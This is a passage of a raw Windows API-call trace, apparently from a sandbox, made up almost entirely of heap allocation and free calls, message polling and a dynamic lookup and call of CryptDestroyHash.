lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.567] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.567] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.567] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.568] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.568] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.569] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0200.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0200.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0200.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.570] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0200.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0200.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.570] CryptDestroyHash (hHash=0xaa5860) returned 1 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.575] 